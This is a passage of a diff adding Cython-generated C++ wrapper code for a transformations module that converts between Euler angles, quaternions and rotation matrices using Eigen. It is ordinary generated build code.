* + * def euler2quat_single(euler): + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) # <<<<<<<<<<<<<< + * cdef Quaternion q = euler2quat_c(e) + * return [q.w(), q.x(), q.y(), q.z()] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_euler, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 58, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 58, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_euler, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 58, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 58, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_euler, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 58, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_4 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 58, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_e = Eigen::Vector3d(__pyx_t_2, __pyx_t_3, __pyx_t_4); + + /* "common/transformations/transformations.pyx":59 + * def euler2quat_single(euler): + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Quaternion q = euler2quat_c(e) # <<<<<<<<<<<<<< + * return [q.w(), q.x(), q.y(), q.z()] + * + */ + __pyx_v_q = euler2quat(__pyx_v_e); + + /* "common/transformations/transformations.pyx":60 + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Quaternion q = euler2quat_c(e) + * return [q.w(), q.x(), q.y(), q.z()] # <<<<<<<<<<<<<< + * + * def quat2euler_single(quat): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_q.w()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 60, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_q.x()); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 60, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = PyFloat_FromDouble(__pyx_v_q.y()); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 60, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = PyFloat_FromDouble(__pyx_v_q.z()); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 60, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = PyList_New(4); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 60, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_GIVEREF(__pyx_t_1); + PyList_SET_ITEM(__pyx_t_8, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_8, 1, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_6); + PyList_SET_ITEM(__pyx_t_8, 2, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_7); + PyList_SET_ITEM(__pyx_t_8, 3, __pyx_t_7); + __pyx_t_1 = 0; + __pyx_t_5 = 0; + __pyx_t_6 = 0; + __pyx_t_7 = 0; + __pyx_r = __pyx_t_8; + __pyx_t_8 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":57 + * return g + * + * def euler2quat_single(euler): # <<<<<<<<<<<<<< + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Quaternion q = euler2quat_c(e) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("common.transformations.transformations.euler2quat_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":62 + * return [q.w(), q.x(), q.y(), q.z()] + * + * def quat2euler_single(quat): # <<<<<<<<<<<<<< + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Vector3 e = quat2euler_c(q); + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_3quat2euler_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_3quat2euler_single = {"quat2euler_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_3quat2euler_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_3quat2euler_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_quat = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("quat2euler_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_quat,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_quat)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 62, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "quat2euler_single") < 0)) __PYX_ERR(0, 62, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_quat = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("quat2euler_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 62, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.quat2euler_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_2quat2euler_single(__pyx_self, __pyx_v_quat); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_2quat2euler_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_quat) { + Eigen::Quaterniond __pyx_v_q; + Eigen::Vector3d __pyx_v_e; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + double __pyx_t_2; + double __pyx_t_3; + double __pyx_t_4; + double __pyx_t_5; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("quat2euler_single", 0); + + /* "common/transformations/transformations.pyx":63 + * + * def quat2euler_single(quat): + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) # <<<<<<<<<<<<<< + * cdef Vector3 e = quat2euler_c(q); + * return [e(0), e(1), e(2)] + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_quat, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 63, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_quat, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 63, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_quat, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_4 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 63, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_quat, 3, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_5 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 63, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_q = Eigen::Quaterniond(__pyx_t_2, __pyx_t_3, __pyx_t_4, __pyx_t_5); + + /* "common/transformations/transformations.pyx":64 + * def quat2euler_single(quat): + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Vector3 e = quat2euler_c(q); # <<<<<<<<<<<<<< + * return [e(0), e(1), e(2)] + * + */ + __pyx_v_e = quat2euler(__pyx_v_q); + + /* "common/transformations/transformations.pyx":65 + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Vector3 e = quat2euler_c(q); + * return [e(0), e(1), e(2)] # <<<<<<<<<<<<<< + * + * def quat2rot_single(quat): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_e(0)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = PyFloat_FromDouble(__pyx_v_e(1)); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = PyFloat_FromDouble(__pyx_v_e(2)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = PyList_New(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_GIVEREF(__pyx_t_1); + PyList_SET_ITEM(__pyx_t_8, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_6); + PyList_SET_ITEM(__pyx_t_8, 1, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_7); + PyList_SET_ITEM(__pyx_t_8, 2, __pyx_t_7); + __pyx_t_1 = 0; + __pyx_t_6 = 0; + __pyx_t_7 = 0; + __pyx_r = __pyx_t_8; + __pyx_t_8 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":62 + * return [q.w(), q.x(), q.y(), q.z()] + * + * def quat2euler_single(quat): # <<<<<<<<<<<<<< + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Vector3 e = quat2euler_c(q); + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("common.transformations.transformations.quat2euler_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":67 + * return [e(0), e(1), e(2)] + * + * def quat2rot_single(quat): # <<<<<<<<<<<<<< + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Matrix3 r = quat2rot_c(q) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_5quat2rot_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_5quat2rot_single = {"quat2rot_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_5quat2rot_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_5quat2rot_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_quat = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("quat2rot_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_quat,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_quat)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 67, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "quat2rot_single") < 0)) __PYX_ERR(0, 67, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_quat = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("quat2rot_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 67, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.quat2rot_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_4quat2rot_single(__pyx_self, __pyx_v_quat); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_4quat2rot_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_quat) { + Eigen::Quaterniond __pyx_v_q; + Eigen::Matrix3d __pyx_v_r; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + double __pyx_t_2; + double __pyx_t_3; + double __pyx_t_4; + double __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("quat2rot_single", 0); + + /* "common/transformations/transformations.pyx":68 + * + * def quat2rot_single(quat): + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) # <<<<<<<<<<<<<< + * cdef Matrix3 r = quat2rot_c(q) + * return matrix2numpy(r) + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_quat, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_2 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_quat, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_3 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_quat, 2, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_4 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_quat, 3, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = __pyx_PyFloat_AsDouble(__pyx_t_1); if (unlikely((__pyx_t_5 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 68, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_q = Eigen::Quaterniond(__pyx_t_2, __pyx_t_3, __pyx_t_4, __pyx_t_5); + + /* "common/transformations/transformations.pyx":69 + * def quat2rot_single(quat): + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Matrix3 r = quat2rot_c(q) # <<<<<<<<<<<<<< + * return matrix2numpy(r) + * + */ + __pyx_v_r = quat2rot(__pyx_v_q); + + /* "common/transformations/transformations.pyx":70 + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Matrix3 r = quat2rot_c(q) + * return matrix2numpy(r) # <<<<<<<<<<<<<< + * + * def rot2quat_single(rot): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((PyObject *)__pyx_f_6common_15transformations_15transformations_matrix2numpy(__pyx_v_r)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 70, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":67 + * return [e(0), e(1), e(2)] + * + * def quat2rot_single(quat): # <<<<<<<<<<<<<< + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Matrix3 r = quat2rot_c(q) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.transformations.transformations.quat2rot_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":72 + * return matrix2numpy(r) + * + * def rot2quat_single(rot): # <<<<<<<<<<<<<< + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Quaternion q = rot2quat_c(r) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_7rot2quat_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_7rot2quat_single = {"rot2quat_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_7rot2quat_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_7rot2quat_single(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_rot = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("rot2quat_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_rot,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_rot)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 72, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "rot2quat_single") < 0)) __PYX_ERR(0, 72, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_rot = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("rot2quat_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 72, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.rot2quat_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_6rot2quat_single(__pyx_self, __pyx_v_rot); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_6rot2quat_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_rot) { + Eigen::Matrix3d __pyx_v_r; + Eigen::Quaterniond __pyx_v_q; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + Eigen::Matrix3d __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("rot2quat_single", 0); + + /* "common/transformations/transformations.pyx":73 + * + * def rot2quat_single(rot): + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) # <<<<<<<<<<<<<< + * cdef Quaternion q = rot2quat_c(r) + * return [q.w(), q.x(), q.y(), q.z()] + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_asfortranarray); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_rot); + __Pyx_GIVEREF(__pyx_v_rot); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_rot); + __pyx_t_3 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_double); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_dtype, __pyx_t_5) < 0) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (!(likely(((__pyx_t_5) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_5, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 73, __pyx_L1_error) + __pyx_t_6 = __pyx_f_6common_15transformations_15transformations_numpy2matrix(((PyArrayObject *)__pyx_t_5)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_r = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_6); + + /* "common/transformations/transformations.pyx":74 + * def rot2quat_single(rot): + * cdef Matrix3 r = 